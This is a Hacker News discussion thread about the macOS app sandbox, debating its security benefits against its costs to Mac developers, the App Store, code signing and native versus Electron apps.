Hacker News
Sandboxed Mac apps can record screen any time without you knowing (krausefx.com)
706 points by Sujan 9 months ago | 232 comments



I was an AppKit engineer when the Mac app sandbox was introduced in 10.7. Much of our effort that release (and in following releases) was dedicated to making Mac features work within sandboxed apps. Think open and save panels, copy and paste, drag and drop, Services menu, Open Recents, etc.

We did our best but the fact is that sandboxed apps run more slowly, have fewer features, are more isolated, and take longer to develop. Sometimes this cost is prohibitive (see Coda 2.5).

IMO the app sandbox was a grievous strategic mistake for the Mac. Cocoa-based Mac apps are rapidly being eaten by web apps and Electron pseudo-desktop apps. For Mac apps to survive, they must capitalize on their strengths: superior performance, better system integration, better dev experience, more features, and higher general quality.

But the app sandbox strikes at all of those. In return it offers security inferior to a web app, as this post illustrates. The price is far too high and the benefits too little.

IMO Apple should drop the Mac app sandbox altogether (though continue to sandbox system services, which is totally sensible, and maybe retain something geared towards browsers.) The code signing requirements and dev cert revocation, which has been successfully used to remotely disable malware, will be sufficient security: the Mac community is good at sussing out bad actors. But force Mac devs to castrate their apps even more, and there won't be anything left to protect.


Not having a sandbox was acceptable in the 80s and 90s, when the software development community was reasonably trustworthy.

The software developers and software companies of today are on average not to be trusted: they will outright steal the customers' private information and sell it or give it away without a second thought.

Absent adequate laws, the success of the iOS permissions model and the complete failure of the Android permission model in protecting customers is perhaps the clearest proof of what a sandbox can achieve. I am reasonably sure that I can download an iOS app - any app - and that my private information will remain secure.

The platforms of today must offer a secure, privacy-preserving running environment. The free for all is dead, and it has been killed by greedy devs and companies.


Apple's implementation of sandboxing actually makes computer users less secure. All the good software is distributed away from the App Store, because sandboxed apps are far too limited (especially regarding the filesystem).

So users have been trained to not use the App Store, where apps have to go through an approval process, and instead to install software from the wild west of random websites.

The fact is that Macs are not phones, the iMac Pro costs six thousand dollars, and expecting users to use the crippled selection of software from the App Store is unworkable. Nobody pays six thousand dollars to play candy crush.


The App Store wasn't made for the 1000 people with iMac Pros. It's made for millions of average Joes who just want to use their computer without having to worry about ransomware.

You are definitely not in that crowd, but most Mac users definitely are. Frankly, until the App Store came out, they were all terrified of installing anything on their computer without some well known brand attached to it (e.g. Microsoft, Google, Adobe).

The App Store has been a great way for Apple to turn a demographic who was traditionally scared of installing apps into a new market.

> So users have been trained to not use the App Store

Again, you and I have been trained. Most users crap their pants when they see anything happen contrary to the "blessed path."


Mac App Store is a fascinating topic! It seems to be a product nearly abandoned by Apple (not much improvement in the years since the first release, unless you count sandboxing as one). The user experience is poor (pages take seconds to load, and the HTML-based buttons need to be clicked multiple times and/or downloads get stuck). Abandonware and copies of copies of copies of "free PDF Reader"-type software from developers who re-publish 300+ apps of questionable quality abound.


Yes the App Store app is so broken and abandoned that it seems far more sketchy than downloading software from a website, which is quite an achievement!


You're being ridiculous. The AppStore is one of the safest ways available to install software.


What value is "safe" if your choices are all extremely limited in what they can do? And if you think you can't get malware past Apple's screening, you're not thinking creatively enough.


It works fine for me, I don't have to hunt for updates to all sorts of apps, pay only one company and have some extra security from the sandbox. Lots of awesome apps are available on the store.

I don't want to allow any app free access to the file system. And anyway, developers have found creative solutions to this problem too. E.g., by asking the user to open the target location from within the app, they can circumvent the protection.

The AppStore has its negative sides too: apps can disappear and be replaced by v2, forcing one to pay again and again.


The AppStore is terrible because it doesn't help developers, so they avoid it.

I'd LOVE to offer my app on the AppStore, but it's too expensive and too restrictive.

A lot more awesome apps are available outside the AppStore.


> Apple's implementation of sandboxing actually makes computer users less secure. All the good software is distributed away from the App Store, because sandboxed apps are far too limited (especially regarding the filesystem).

Nonsense. The vast majority of users don't need software that does wacky stuff with the file system. They need software that opens documents they made, which all software in the app store can do. I'm a pro (the kind that currently owns the Mac Pro and will likely own the next one or the iMac Pro next), and I basically avoid all software that's not from the App Store. Your ranting sounds delusional to me.


> The vast majority of users don't need software that does wacky stuff with the file system.

It's not about "wacky stuff"; it's about basic things. Apps in the AppStore are horribly crippled compared to their non-AppStore counterparts.

I'm a pro, and like many other pros, basically avoid all software from the AppStore.


> Nonsense. The vast majority of users don't need software that does wacky stuff with the file system.

Uhhhh, what? You're justifying a company you PAID thousands of dollars to remain in control of your device? We're already fighting this sort of inane thinking in domains where these ideas have been put into practice. Look up John Deere, and the Freedom to Fix.

> They need software that opens documents they made, which all software in the app store can do. I'm a pro (the kind that currently owns the Mac Pro and will likely own the next one or the iMac Pro next), and I basically avoid all software that's not from the App Store.

Ok. You can choose to or not to.

> Your ranting sounds delusional to me.

You're calling someone else delusional for calling bullshit on Apple's faux-security? And you're calling for the app-ification of all computers? The person calling bullshit on Apple-faux-security isn't the delusional one here.


“You're justifying a company you PAID thousands of dollars to remain in control of your device?“

This is the bit that you FOSS diehards don’t get. Nobody really cares. What they want is something that they can switch on and go to Facebook or edit their documents on. They don’t want to tinker with kernel extensions or run servers. For most, computing appliances are far more convenient.


Nobody really cares? You know, we're on this forum called hackernews?

You might want to pack up that opinion and take it to some place called "consumernews" or something (they might call it "productnews" these days). That is where nobody really cares.

Meanwhile, most of the "FOSS diehards" get it just fine. People want convenience. It's not that hard to understand, and you're making yourself look like a fool if that's your claim. That doesn't mean convenience is the right way forward, even if people want it or don't care.

Since when is "people don't care" a viable argument for anything? The people who don't care don't understand this.


“Since when is "people don't care" a viable argument for anything? The people who don't care don't understand this.”

So climb down from your ivory tower and make them understand, without resorting to the usual rhetoric as you have done here.


> Nobody pays six thousand dollars to play candy crush.

You would be surprised.


> The fact is that Macs are not phones, the iMac Pro costs six thousand dollars, and expecting users to use the crippled selection of software from the App Store is unworkable.

Keep in mind that professional users that buy the iMac Pro use pro apps, like AutoCAD, Final Cut, Logic, ProTools, Creative Suite and the like; these apps are mission-critical to their workflows and are not crippled.


> The software developers and software companies of today are on average not to be trusted: they will outright steal the customers' private information and sell it or give it away without a second thought.

This is an 'unintended side effect' of the software-as-a-service model. When software was licensed the software itself was what made the money, and there was no way that someone would buy a piece of software if it did not at least try to keep the data safe, in one piece and on the users' computer. But with software-as-a-service the user expects to see their data moving elsewhere and once that has happened all bets are off on how it can - and will - be monetized.


I agree that the idea of a sandbox and Mac App Store is still a vision worth continuing. The problem is that like macOS itself, it seems to have been sidelined for the past few years in favor of iOS and other endeavors.

The performance and limitations can definitely be improved, if not eliminated, if Apple focused on it. The question is: Will they?


> The free for all is dead, and it has been killed by greedy devs and companies.

I agree with you but think there should be more emphasis on connectivity.

In the 80's and 90's (less so, of course, in the 90's), if you got a computer virus it was probably from sharing software ... on a floppy disk. I used a Mac during those decades, and viruses, like other software, were rare on that platform. :-/

The internet changed everything. Not only does the internet serve up compromised software it provides the back-channel so the malware can phone home.

I don't have any suggestions or any sort of panacea. It's nice sometimes just to reflect on how computing used to be. Back before passwords, sandboxes....


I agree, it's terrible. As a user, I often go to pains to avoid getting the App Store version of an app, if an alternative exists, because those apps are crippled to such a degree that they aren't worth using.

If I'm using the App Store stuff, then my text editor can't edit all my files, my video player can't open videos when I double-click them, my Evernote can't print to PDF, my disk usage analyzer can't analyze my disk because it can't ask me for authorization to do so, and so on.

At the same time, though, in theory I do want sandboxing, at least by default. I do want to have to explicitly authorize some random app before it can install a printer system extension, or before it can scan my entire disk.

I feel like the problem is more political/cultural: Apple prioritizes their low-information, low-computer-literacy users (hi, Dad!) so dearly, that they aren't willing to expend resources to find any compromise for their technically proficient ones. And through the sandboxing requirements, they force their third-party developers to either tell their power users to fuck off, or to give up on the App Store.

Or, I don't know, perhaps they just don't have enough engineers left for the Mac after moving so many of them to their higher-volume Candy Crush console business.

Regardless, though, if there were mechanisms for the user to control the sandboxing enforcement to a greater degree, I would be all for it.

If we could tell our Macs "yes, dude, I hereby authorize DaisyDisk to see all the files" and "Computer, hey bud do me a favor, overrule this restriction that says CotEditor can't ask me to authorize modifying root-owned files", then I would actually not only be happy with, but even prefer, the App Store versions.

But we can't, and it's sad.


I feel completely the same.

The problem, though: if you allow user overrides, then the next TotallyNotShadyVideoPlayer will kindly ask you to add the manual override for "can't read the screen" and, if you agree, it'll steal your credentials. That is, regular users will find it easy to self-pwn.

I don't think this can be solved on the software side. It's "security vs. usefulness, pick one" kind of situation. Maybe we need to tackle the human factor - make it easier to prosecute malicious code authors - but not sure if that's any more possible to implement than software that's both useful and secure.


Yep, that's what I meant: Apple's stance is, We can't let veidr override sandbox limitations, because then his dad might get pwned.

That's true, as far as it goes. My view is, maybe you make the dialog to do that scary enough; maybe you have to go enable some security setting to even make the dialog possible; maybe, even so, you have to accept that some users like my dad will get fooled and exploited.

OTOH, it's already a slippery slope; even more secure would be to completely prohibit all third-party software entirely.

I think they are drawing the lines wrong.


History shows that if the dialog shows up often enough people will simply hit accept/ok/whatever without reading what it is about.


> maybe you have to go enable some security setting to even make the dialog possible

This sounds like you're on the right track. Make it a shell command you have to execute with SIP disabled.


> If I'm using the App Store stuff, then my text editor can't edit all my files, my video player can't open videos when I double-click them, my Evernote can't print to PDF, my disk usage analyzer can't analyze my disk because it can't ask me for authorization to do so, and so on.

I fail to see how the macOS sandbox prevents this. Disk usage analyser can ask you for disk access, sandboxed video players can surely open files double clicked in Finder, sandboxed apps can print to PDF.

A few examples: QuickTime Player is sandboxed, Pages is sandboxed.


> I fail to see how the macOS sandbox prevents this

I think you might be thinking of the reasonable sandbox we wish we had, not the one we have.

https://daisydiskapp.com/manual/4/en/Topics/Editions.html

(Apple's own apps do not have to follow the rules that third-party apps do.)


Ok, that's a limitation. What about the other ones you described? I wrote a bunch of sandboxed apps, and the sandbox is good enough for a document-based app (when working on a single document).


The sandbox allows apps to open files via three methods:

* Open dialogs

* A limited number of files that have been opened in the past via open dialogs (intended for e.g. recent files)

* Files that live in the app's sandboxed region of the filesystem.

That's it. So your text editor can't open ~/.bash_profile unless it pops up an open dialog and asks you to manually click it.
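The first two of those routes look roughly like this in code — a minimal, macOS-only sketch for a sandboxed AppKit app (the `savedBookmark` key name is illustrative, not an Apple API):

```swift
import AppKit

// 1. Ask the user: whatever they pick in the panel, the sandbox lets the app access.
let panel = NSOpenPanel()
panel.showsHiddenFiles = true  // needed to reach dotfiles like ~/.bash_profile
if panel.runModal() == .OK, let url = panel.url {
    // 2. Persist the grant across launches with a security-scoped bookmark
    //    (this is the mechanism behind the "recent files" exception).
    if let bookmark = try? url.bookmarkData(options: .withSecurityScope,
                                            includingResourceValuesForKeys: nil,
                                            relativeTo: nil) {
        UserDefaults.standard.set(bookmark, forKey: "savedBookmark")
    }
}

// On a later launch, resolve the bookmark and re-enter its scope:
if let data = UserDefaults.standard.data(forKey: "savedBookmark") {
    var isStale = false
    if let url = try? URL(resolvingBookmarkData: data,
                          options: .withSecurityScope,
                          relativeTo: nil,
                          bookmarkDataIsStale: &isStale),
       url.startAccessingSecurityScopedResource() {
        defer { url.stopAccessingSecurityScopedResource() }
        // ... read or write the file here ...
    }
}
```

The third route, the app's own container under ~/Library/Containers, needs no grant at all — which is exactly why everything outside it feels so restricted.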


How exactly is that a problem? You can pop up an open dialog that starts in the user's home directory, and even preselect ".bash_profile" for them. All they have to do is click "OK" to start editing it. This gives them the security that your app can't just go and erase or overwrite or add malicious stuff to their .bash_profile without their consent, which seems like a really good idea!


Which is a good thing for most users, just not the power users that would potentially want their editor to open ~/.bash_profile (although the downside is that if they were allowed to do so, they could do so silently as well... which is the problem Apple is trying to solve for).


I'm a bit confused - if I explicitly want my text editor to open ~/.bash_profile, then I need to tell it that, which I would do through the Open dialog for GUI apps (or as a command line parameter for command line apps); and if I don't explicitly want to do so, then it probably shouldn't be opening it behind my back.

This sandboxing would be a problem with editors that naturally work with multi-file projects (e.g. an IDE where you'd want to open a whole Java project of linked files), but in the text editor scenario this limitation seems to make sense.


Those examples don't make any sense. All of them are possible within sandbox except perhaps the disk usage analyser.


> Evernote can't print to PDF

Yes it can. The print dialog has a whole PDF menu.


Ugh, sorry, my bad; this one, I misstated. I meant that Evernote (App Store version) isn't allowed to have the "Save PDF to Evernote" feature.

That feature is very useful, though; it can save anything, from any app that can print, to Evernote.


That's not true either. You can definitely save PDFs in Evernote on the Mac (btw, there's only the App Store version of Evernote, if you discount the web version).

To save PDF into Evernote on the Mac:

- If it's a file: use the share option (right click > Share > Evernote)
- If it's in a browser: in Safari, click on Share (top right-hand corner of the browser) > Evernote. If it's in Chrome, AFAIK, you have to use Evernote Web Clipper (extension), which is also available for Safari.
- Of course, you can also copy/paste or drag and drop the PDF into Evernote


I am talking about the feature whereby any app that can print can print directly to Evernote, as a PDF. This feature is very useful, though web clipper and the Sharing extension offer workarounds for some applications.

Screenshot: https://www.dropbox.com/s/xt4xqcr4lp1tpvh/Screenshot%202018-...


I personally am happy with subscription based applications in the App Store. I feel more confident that Apple will manage my credit card information better than unknown application developer.


I'm a big fan of desktop sandboxing, so thanks for the hard work. I dreaded running the unsandboxed Office:mac 2011 with its constant stream of "critical" security updates. That was definitely my worst experience using native apps.

On the other hand, I am not sure that code signing has been an all-around success. It seems to make life harder for the long tail of one-off apps and open source ports. And bad actors are only blacklisted after they've been caught. https://panic.com/blog/stolen-source-code/ - related: https://github.com/HandBrake/HandBrake/issues/619

I think I would prefer a security model where you could just download and start any .app, but upon first opening it, a dialog would inform you about its code-signing author and the permissions that the app has (with striking red/green color coding). Because right now, there is no way to tell which apps even use sandboxing without opening Activity Monitor, and there is no incentive for non-App-Store apps to use sandboxing. (There is a dialog when opening a downloaded app for the first time, but it's grey and boring and not helpful at all.)


The only thing required to get a Developer ID signing certificate is a valid credit card (and I guess it's not so hard to steal one). The Transmission malware was signed; the Eltima Player malware was signed.

I agree with the need for a better first-launch dialog.


Yes, many developers sign, and then fail to offer a secure way of verifying that the signature belongs to them.

But it's still better than nothing, I'm sure they would offer unsigned HTTP downloads if Apple didn't force them to get their shit together.


If the burden for authentication is on the developers anyway, then code-signing shouldn't require a 99€/year subscription. 99€ is a sum that doesn't help Apple, doesn't hinder criminals, but causes headaches for open-source projects and casual developers.


Yeah, Apple could do a better job authenticating public companies, by publishing the company name, address, etc associated with a certificate.

This would solve most of my complaints.


It does strike me as something that is very difficult to retrofit.

I'm not sure Apple should give up on it though, I don't want any old application I download to be able to read through the spreadsheets in my Accounting folder.

Perhaps the emergence of Electron is a wake up call for Apple and Microsoft, there is clearly a demand for creating applications with web technologies, OS developers need to respond to that rather than letting a third party eat their lunch.


It's a hard UI problem. The Mac sandbox overcorrects to requiring capability resources for all file accesses, while on the other extreme we have e.g. Windows UAC which trains users to roll their eyes and click through.

But Apple doesn't enjoy the luxury of solving this problem in a nuanced way, because Mac apps are not acting from a position of strength. I suspect you aren't downloading lots of Mac apps today, and the reason is not insufficient sandboxing, but instead the limited selection, annoying install experience, etc. These are the problems that Apple must fix first.

> Perhaps the emergence of Electron is a wake up call for Apple and Microsoft, there is clearly a demand for creating applications with web technologies

34 years ago, the Mac was new and generated developer excitement. But Apple was afraid the Mac would be dragged down via shitty DOS ports of apps like e.g. WordPerfect. Apple's response was to set a high bar via first-party "killer apps" like MacWrite, which would embarrass any such DOS ports. It worked: the Mac set the desktop publishing standard for years, decades even, and arguably still dominates.

Yes, there's a demand for developing apps with web technologies, but embracing that is a losing strategy for Apple. Why should I buy a Mac to run web apps that run equally well on a Chinese Chromebook? That's ceding any software advantage.

Instead Apple should leverage the Mac's unique software strengths. Aggressively evolve the Mac's unique "UI vocabulary" and application frameworks. Empower, not punish, the dedicated and passionate developer community. Ship love to the userbase (perhaps the only one in existence) that's willing to open their wallets for high-quality desktop software. And yes, tolerate web-tech apps too - but embarrass them!


Can you elaborate on the "annoying install experience"? I find the complete opposite: most apps are drag-and-drop installs (and finish their setup on first launch, if any); others use a very simple click-through installer. I find the installation experience to be much more ... annoying in Windows sometimes. In OS X, most apps are installed by dragging and dropping into /Applications (usually via a folder alias right next to the app, and even that isn't strictly required), with the "installation progress" being just however long it takes to copy data to the disk out of a compressed dmg. In Windows, most installers I run into still race straight to 99%, then sit there for however long the actual installation takes, or circle back 15 times.


I believe they are saying installing from the Mac App Store is an annoying experience, which I agree. It’s an inexplicably slow and clunky piece of garbage. It’s almost impressive how bad it is for a “first party” application.


That's because the Mac App Store was spawned from iTunes, which has to be the shittiest piece of garbage to ever stain the hard disks of Macs.


Best case, installing a non-MAS app involves downloading and extracting a zip file, mounting and then copying from a disk image, and then clicking through the "application downloaded from the Internet!" dialog.

Yes it's still much better than the typical Windows installer experience, but zero-install web apps are now setting the bar.


We're not talking about simple, zero-install web apps here. We're mostly talking about Electron apps, which are "web apps" but are still downloaded in the traditional sense.


From a developer's standpoint, what advantages do I get from making a native Mac app compared to a web app or an Electron app?

Web apps in the browser are OS-agnostic and Electron apps can be easily made cross-platform.


The answer is quality. As a Mac user I always prefer a native Mac app to some cross-platform app, even one with nominally more features.

More specifically:

1. Superior performance. Native apps are just faster. They launch faster. They use an order of magnitude less memory. Multithreading via GCD is much much nicer than Web Workers. Large files are better supported. You can have very large tables. etc.

2. They properly implement Mac UI idioms. By comparison even the nicest Electron-like app (VSCode) violates many longstanding expectations: it doesn't properly highlight the menu bar when typing a key equivalent, menu items don't disable properly, the text highlight color is wrong, text selection anchors incorrectly, no column selection, text drag and drop is badly broken, undo doesn't know what it's undoing, undo coalesces incorrectly, hell even arrow keys sometimes go the wrong way. It's an island app doing its own thing.

The theory of the Mac is to establish a set of UI conventions. When you launched a new app, you would already know how to use most of it, because it was a Mac app. It looks and behaves like other apps, so you feel at home already. And as a developer, you get the right behavior now and in the future, for free.

But if every developer builds a cross-platform app with a custom framework and appearance and behavior and UI, then the OS loses its role in defining the platform conventions. In that event, what's the point in having more than one OS?
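On the GCD point in (1), the ergonomics gap is easy to illustrate — a hedged sketch using only the cross-platform Dispatch module, not taken from any app in this thread:

```swift
import Dispatch

// Split a sum of squares across CPU cores with a single GCD call —
// no worker scripts, no message passing, no data serialization.
func parallelSumOfSquares(upTo n: Int, chunks: Int = 8) -> Int {
    var partials = [Int](repeating: 0, count: chunks)
    partials.withUnsafeMutableBufferPointer { buf in
        DispatchQueue.concurrentPerform(iterations: chunks) { c in
            // Chunk c handles i = c, c + chunks, c + 2*chunks, ...
            var acc = 0
            var i = c
            while i < n {
                acc += i * i
                i += chunks
            }
            buf[c] = acc  // each chunk writes its own slot; no locking needed
        }
    }
    return partials.reduce(0, +)
}

print(parallelSumOfSquares(upTo: 1_000))  // prints 332833500
```

The Web Workers equivalent requires a separate script file, structured-clone message passing, and manual result aggregation across `onmessage` callbacks.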


I fully agree with you. I love 3rd party Mac apps that look and act like Mac apps (Like Sequel Pro) but you still didn't answer my question.

From a developer's point of view, it's just better to make a web app or an Electron app that will be used by everyone regardless of their OS. Not only is it less of a hassle to develop, it also guarantees that more people are going to use it.


I doubt that Web Workers vs. GCD makes a difference in user-visible performance. Parallelism matters more for domains that are the responsibility of the platform: image decoding, media playback, vector graphics, etc. (Web browser engines are starting to run away from the Mac system libraries in some of these areas, by the way: Skia and even Cairo/Pixman significantly outperform Core Graphics in many cases at this point, for instance.)

I'd also argue that VS Code isn't much worse off than most native code editors. Most code editors outside of Xcode don't use NSTextView and so have to implement all of the behavior themselves anyhow. For example, as far as I'm aware Sublime Text pretty much implements just as much of the core editing logic as VS Code does.

I'm not denying your complaints, of course--they're valid--but I don't think the gap between native and Web/Electron is as big as you're implying.


3. Native is easier to develop (Swift vs. JavaScript, Cocoa vs. DOM) and has a more robust result.


Don't know where this is coming from because in my experience developing for the web is much easier. There is tons of up to date documentation out there.

Whereas developing Mac apps seems to rely on a set of arcane knowledge and having been in the scene for years. The documentation for AppKit is vastly outdated and there is almost no blogging/tutorials scene so as a newbie you are basically going to be going through a lot of trial and error.

And then most of the documentation you will find is in ObjC while everyone around you is telling you to develop in Swift, but then Swift changes every few months. You open up a project from a few months ago, it doesn't compile anymore, and you basically have to work at Apple or be a dev god to fix it.

So.... native is easier to develop for? No way.


The trade-off is that they’re much shittier to use. Faster to develop, worse experience.

That’s an okay decision to make if it fits your product and market needs, but it’s important not to forget the cost.

Native apps perform better, integrate better with other system services, are more power efficient, use less storage space… usually technically superior in every way, with the exception that they are less portable and in some cases more time-consuming to build.


So, they are more work for developers, but are technically superior for users (native UI, performance, battery life, etc.)


One way to isolate applications, common for server daemons, is to run them under their own user. The real "human" user can sudo into any application account, and does so on application execution. Marketing would have to rename things and slap a GUI over the feature, but I don't see why it wouldn't work for arbitrary Cocoa apps. (And the screen-capture API should be limited to capturing parts of the screen the application is currently drawing to, with overlaps clipped out, etc.)


That's clearly not viable, as displayed in the linked article. One of the examples of a good use for this was 1Password reading QR codes from a browser. Additionally, how would screen capture software work?


So if I argue that Clojure is a great language, you'd reject that claim because you can't write drivers in it. Got it.


I think this is really flawed logic. Sandboxing adds some development cost, sure, but the implication here ("grievous strategic mistake") is that it's the key reason developers are building web apps instead of native Mac apps. That just defies common sense.

Clearly the key reason Mac apps cost so much to develop is the platform-specific codebase they require. Mac apps have little in common even with iOS apps, so it's a huge cost. Against that baseline, adding sandbox entitlements is an extremely minor incremental cost.

It's not like eliminating the sandbox would drop the cost of Mac apps by some huge factor. Developers are writing web apps because they can use a cross-platform codebase, plain and simple. That's why I am much more optimistic about the rumor that Apple will lower the delta between Mac and iOS codebases, letting devs leverage their iOS investments. There will always be a cost to adapting a touch-based app to the desktop, but there's orders of magnitude more efficiency to be gained there than in blowing away a whole layer of the security model.


One thing I quite liked about the sandbox is running marginally (un)trusted code either interactively or as part of some process, and for that sandbox-exec(1) is great. Security best comes in layers and it's a worthy addition to the toolbox.

It's used by homebrew[0] during the build steps, I hear it's in progress for Nix, and I may make use of it in the future for archmac. Unfortunately it's been marked as deprecated in the man page:

    SANDBOX-EXEC(1)           BSD General Commands Manual          SANDBOX-EXEC(1)
    
    NAME
         sandbox-exec -- execute within a sandbox (DEPRECATED)

[0]: https://github.com/Homebrew/brew/blob/master/Library/Homebre...
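For anyone who hasn't tried it: sandbox-exec profiles are written in a small Scheme-like language. A minimal, illustrative profile (the `no-network.sb` filename is made up) that allows everything except network access looks like:

```
; no-network.sb -- allow everything except the network
(version 1)
(allow default)
(deny network*)
```

Running `sandbox-exec -f no-network.sb curl https://example.com` should then fail at the connect step, while the process otherwise behaves normally.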


The rumor is that Apple wants to unify the iPhone, iPad, and Mac platforms [1]. So my guess is that they will keep sandboxed apps, because iOS apps are also highly sandboxed.

[1] https://www.bloomberg.com/news/articles/2017-12-20/apple-is-...


I'm not sure Cocoa's dev experience is a plus right now though - isn't Marzipan intended to fix that?

I mean, you were on the AppKit team, so I don't think I need to list out the oddities/issues/etc it's currently got. Just curious if the general attitude in Apple was akin to "it's fine", or "we know it needs work, but we'll get there eventually".


Mac Cocoa dev has been evolving slowly and incrementally due to the small team size and strong backwards compatibility culture. It's fallen behind as a result. But fundamentally a platform-specific API and toolset can move much faster than a standards-limited web API.

That said it's easy to overextend yourself, as Microsoft demonstrated with their API treadmill. The art of engineering is to set the right evolutionary pace.

Your question is very good, and above my pay grade. In 2013 I had lots of opinions about how ObjC was evolving too slowly, and I was floored the next year when Swift (a well-kept secret within Apple) was unveiled. Apple is full of surprises, even to its own employees.


I don't disagree re: the pace, but I think it's important to note that when it's really just Electron (Chrome) that people are shoving everywhere, it's not _really_ a standards-limited web API... it's whatever Google opts to give them. Electron is sadly the first really approachable "build your app in a virtual machine and it'll just work" approach.

Anyway, not looking to derail the discussion, just wanted to say thanks for commenting - wasn't sure if anyone ex-Apple would be comfortable doing so.


I really don't think shrugging and giving up on security for desktop apps is a viable path.

> their strengths: superior performance, better system integration, better dev experience, more features, and higher general quality

These are important, but you generally do not want to sacrifice security to get them. The sandbox is opt-in on the Mac so where you have an app you believe cannot live in it, you have that choice. Saying Mac devs are forced to castrate their apps isn't accurate or fair.


Thanks for your effort. I prefer Mac App Store apps, when they're at parity with non-store releases, because there are fewer licenses to install and manage (even if they all go in my password manager), and because I can upgrade all the App Store apps in one go instead of being nagged by each one separately.


As an old person my assumption is that a desktop app can basically do whatever it wants with the screen, mouse, keyboard, or audio while it's actually running.

Isn't that what apps are for? This just seems like expected behavior. If you don't want apps doing stuff don't run them on your desktop computer.


I agree. This feels to me more like inducing paranoia to push some hidden agenda. The "open" design is a feature, not a bug, and the isolated design of mobile apps only encourages siloed data and horribly wasteful workarounds (upload something from one app to some distant third-party cloud service, then download it again for another app to access it... provided those two apps' developers have explicitly decided to provide such a feature).

Every binary I run could delete all my data or steal my passwords or whatever else. That's not something to be afraid of --- it's something to cherish and be proud of[1], and it's why you don't run anything you don't trust. This "free-for-all" sharing and access encourages the sort of ad-hoc and unpremeditated interactions which are beneficial to the software ecosystem as a whole.

I usually have a magnifier, color identifier, and clipboard-listening translator running. None of those would be easy to implement, and some might not exist at all, had computers started out as locked-down systems from the beginning.

[1] https://boingboing.net/2012/08/23/civilwar.html


There's a difference between locked-down-by-Apple and locked-down-by-you according to your own choices (e.g. Qubes). Being able to run software from others without being completely vulnerable to them is essential to the open ecosystem we want. A free-for-all OS is like a meatspace without private property: it can work only at a small scale.


The data siloing on iOS is a UI decision, not a sandboxing decision. They decided most people simply don't understand filesystems (probably based on all the people they've seen who just save their files in the default directory, or the desktop, or the recycle bin(!) and then can't find them).

In the macOS sandbox, an app can access any old file, but only ones the user has implicitly told the app it can access - through the system "open file" dialog, double-clicking, drag & drop, etc.


iOS was never meant to handle files, imo.

It was meant as a souped up iPod platform, tethered to iTunes.

I just wish we didn't have to wait for Windows 8/10 to get "sane" file management on tablets, after Google mangled Android from 3.1 onwards.


A design that dooms even savvy users to being compromised is simply not acceptable anymore. Most people are not discriminating enough about the software they install. But okay, maybe you actually are and never make mistakes[1]. But is all the software you use signed? By a certificate traceable to a real, accountable person? Can a software update, perhaps released by someone who has hacked the original developer, come along and turn it into malware? Because all of your apps run with full capabilities, such an update can now do things that you would never grant if explicitly asked.

Now you're completely screwed. All of your emails, pictures, medical information, other embarrassing personal information/media, bank logins, and so forth are compromised. Maybe you have two-factor authentication for all of your accounts (doubtful), but who cares? It can just read the memory of your browser process, quietly wait for you to login to the various services, and then hijack your sessions in the background.

So tell me: how in the world is this an acceptable situation?

[1] I sure hope you never use any of these new-school package managers for various programming languages, text editors, and such. You know, the ones that grab the latest commit from GitHub repositories run by total strangers and then run them with full privileges.


Even if it’s signed software, the sandbox is a useful layer in limiting the scope of any vulnerabilities it has. Say a media player has a bug in its decoder that allows a malicious video file to make the player execute arbitrary code. If the program is sandboxed, they shouldn’t be able to pivot from that into stealing your ssh keys or recording your screen.


> So tell me: how in the world is this an acceptable situation?

It is benefit vs. cost: for me it is acceptable because I want to be able to do whatever I want with my computer, using applications that can freely interact with each other without the OS getting in my way. I want the underlying system to provide the functionality for applications to perform their tasks, not add unnecessary barriers that make some features practically impossible.

Also, FWIW, personally as a developer I highly dislike the idea of signed software. First, I do not like the idea of having to ask (let alone pay) anyone for my program to be runnable by others, and second, I do not like the idea of my name being carried alongside my programs unless I explicitly add it.


> It is benefit vs cost: for me it is acceptable because i want to be able to do whatever i want with my computer using applications that can freely interact with each other without the OS getting in my way.

It is not the eighties anymore. Software is exploited through malicious files that exploit vulnerabilities in file readers (e.g. malicious PDFs). Software distribution sites get compromised (Handbrake, Transmission, Linux Mint), etc. Signatures and proper sandboxing reduce the attack surface considerably.

Also, to address your point: sandboxing does not have to be binary. For instance, on macOS, a sandboxed app can request access to the user's calendar or address book. In that way some random app can't just steal your address book. [1] By default an application cannot open any files from the user's home directory, unless the user e.g. chooses one using a file-open dialog (which runs out-of-process). With Flatpak on Linux, you as a user can decide to run an application with more entitlements (AFAIK currently only through the command line).
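
To make the opt-in granularity concrete, here's a sketch of the kind of entitlements plist a sandboxed Mac app declares at build time. The key names are real public entitlement identifiers, but this particular selection is illustrative:

```
<key>com.apple.security.app-sandbox</key>
<true/>
<!-- grants the ask-the-user flow for the address book -->
<key>com.apple.security.personal-information.addressbook</key>
<true/>
<!-- files become readable only after the user picks them in an open panel -->
<key>com.apple.security.files.user-selected.read-only</key>
<true/>
```

Anything not declared (and not granted by the user at runtime) is simply denied.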

We need to go to a world where the power lies with the user and not the developer to decide what an app can access, upload, etc. macOS sandboxing and Flatpaks on Linux are now providing part of that solution.

> Also FWIW personally as a developer i highly dislike the idea of signed software. First of all i do not like the idea of having to ask (let alone pay) anyone to have my program be runnable by others

Flatpaks on Linux are normally signed, but they can be signed using a GnuPG key. No need to pay or ask permission. Of course, the downside of this model is that it puts the burden on the user to check that the key is owned by a reputable person.

> second i do not like the idea of my name being carried alongside my programs unless i explicitly add it

Most users should not want to run a program by a random person.

[1] Don't say that free software is not vulnerable to such problems. A popular free software documentation browser embeds a Google Ad, some open source applications use Google Analytics. I do not want to upload any data to Google. Unfortunately, as a user, I can only avoid that by inspecting all my outgoing connections. Of course, this is out of the reach of a normal user. I would absolutely be in favor of sandboxes where by default an app could not make any network connection.


> We need to go to a world where the power lies with the user and not the developer to decide what an app can access, upload, etc. macOS sandboxing and Flatpaks on Linux are now providing part of that solution. [..] Flatpaks on Linux are normally signed, but they can be signed using GnuPG key. No need to pay or ask permission. Of course, the downside of this model is that it puts the burden on the user to check that the key is owned by a reputable person.

I do not see those as placing power in the hands of the user; I see it more as placing power in the hands of the platform holder the developer develops for and the user uses. The user should be able to do whatever he pleases, even at the cost of the developer's wishes, and for that the platform must allow the user to subvert both the platform's restrictions and the program's requests.

Anything that doesn't put the user in a position of utmost authority and trust is not something that places powers in the hands of the user.


“Most users should not want to run a program by a random person.”

This is demonstrably not true. Most users will go out of their way to run any software if they believe that it will do what they’re looking for.


I think the emphasis is supposed to be on the ‘should’. That is, it’s not in the user’s rational interests to run such software. Hence the locked down security model all the platforms are moving toward.


As the sibling commenter points out, I said 'should' (as in: ought); I am not describing the factual situation.


